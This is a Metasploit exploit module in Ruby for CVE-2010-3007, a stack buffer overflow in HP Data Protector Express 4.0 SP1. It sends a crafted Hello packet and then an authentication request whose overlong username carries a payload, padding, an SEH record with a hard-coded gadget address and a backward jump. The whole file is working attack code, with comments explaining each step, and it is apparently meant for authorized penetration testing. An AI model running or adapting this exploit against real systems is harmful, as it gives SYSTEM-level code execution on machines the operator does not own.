##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
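# Exploit for CVE-2010-3007: SEH-based stack buffer overflow in the
# DtbClsLogin routine of HP Data Protector Express 4.0 SP1 (dpwindtb.dll).
# The overflow is triggered by an overlong username in the authentication
# request; the preceding "Hello" exchange is required before the service
# accepts that request.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Substring that check() looks for in the Hello response to decide the
  # Data Protector Express domain service is listening. Note the same bytes
  # are also part of the request we send, so this only fingerprints the
  # service - it does not prove the target is unpatched.
  HELLO_MARKER = 'Dtb: Context'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Data Protector DtbClsLogin Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The
          overflow occurs during the login process, in the DtbClsLogin function provided by
          the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an
          insecure way with the username. A successful exploitation will lead to code execution
          with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server
          Service) process, which runs as SYSTEM by default.
        },
        'Author' => [
          'AbdulAziz Hariri', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2010-3007' ],
          [ 'OSVDB', '67973' ],
          [ 'BID', '43105' ],
          [ 'ZDI', '10-174' ],
          [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535' ]
        ],
        'Payload' => {
          # Space equals the target Offset: the encoded payload sits at the very
          # start of the username and is padded up to the SEH record, so a
          # NOP sled would only eat into that space.
          'Space' => 712,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3',
            {
              # pop/pop/ret gadget from an OS DLL, so the address is tied to
              # this Windows build rather than to the Data Protector version.
              'Ret' => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012)
              'Offset' => 712
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => true,
        'DisclosureDate' => '2010-09-09',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    register_options(
      [
        Opt::RPORT(3817),
      ]
    )
  end

  # Detection only: a Hello response containing HELLO_MARKER means the domain
  # service answered, which is reported as Detected rather than Vulnerable
  # because nothing here distinguishes a patched build from an unpatched one.
  #
  # @return [Msf::Exploit::CheckCode] Detected or Safe
  def check
    connect

    response = send_hello
    if response && response.include?(HELLO_MARKER)
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  ensure
    # Always release the socket, including when connect/put/get raise.
    disconnect
  end

  # Performs the Hello handshake and then sends the oversized username in the
  # authentication request. Aborts (without sending the overflow) when the
  # service gives no Hello response at all.
  def exploit
    connect

    response = send_hello
    if response.nil? || response.empty?
      print_error("#{sock.peerinfo} - The Hello Request hasn't received a response")
      return
    end

    print_status("#{sock.peerinfo} - Sending Authentication Request")
    sock.put(build_auth_request)
  ensure
    # The original returned early on a missing Hello response without closing
    # the socket; the ensure covers that path and any exception raised above.
    disconnect
  end

  private

  # Sends the Hello request on the current socket and returns whatever the
  # service answers within 10 seconds (nil on timeout / no data).
  #
  # @return [String, nil] raw Hello response
  def send_hello
    print_status("#{sock.peerinfo} - Sending Hello Request")
    sock.put(build_hello_request)
    sock.get_once(-1, 10)
  end

  # Builds the fixed Hello request used by both check and exploit. Only the
  # 15-byte machine name is randomised per run; every other byte (including
  # what looks like an embedded IPv4 address, c0 a8 01 86 at offset 20) is a
  # captured constant - presumably an artifact of the session this packet was
  # derived from, and sent unchanged from any attacking host.
  #
  # @return [String] Hello request bytes
  def build_hello_request
    machine_name = rand_text_alpha(15)

    # .dup so we never append to (and mutate) the shared literal.
    hello = "\x54\x84\x00\x00\x00\x00\x00\x00".dup
    hello << "\x00\x01\x00\x00\x92\x00\x00\x00"
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00"
    hello << machine_name << "\x00"
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"
    hello
  end

  # Builds the authentication request whose username field carries the
  # overflow. Layout of the username:
  #
  #   [payload][random pad up to Offset][SEH record][jmp back][~100 KB random]
  #
  # The SEH record's handler is the pop/pop/ret in target.ret, which lands on
  # the 'jmp $-(Offset+8)' placed right after the record; that jump skips back
  # over the 8-byte SEH record and the Offset bytes before it, i.e. to the
  # first byte of the payload.
  #
  # @return [String] complete authentication packet with length field filled in
  def build_auth_request
    # Copy: payload.encoded may be cached by the framework and must not be
    # mutated in place by the appends below.
    bof = payload.encoded.dup
    # Space == Offset, so this pad is >= 0 bytes.
    bof << rand_text(target['Offset'] - bof.length)
    bof << generate_seh_record(target.ret)
    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8}").encode_string
    # The long random tail is what forces the exception: only a few bytes are
    # left until the end of the stack, and when dynamic memory is mapped right
    # after the stack the copy must run well past it to fault. Jumping back to
    # the payload (above) rather than forward into this tail is what keeps the
    # exploit reliable.
    bof << rand_text(100000)

    pkt = [
      0x8451,     # packet id
      0x32020202, # svc id
      0x00000018, # cmd id
      0           # pkt length, placeholder patched below once the packet is built
    ].pack('V4')
    pkt << "\x00\x00\x00\x00" # ?Unknown?
    pkt << bof # username

    # Total length (header included) lives at offset 12, little-endian.
    pkt[12, 4] = [pkt.length].pack('V')
    pkt
  end
end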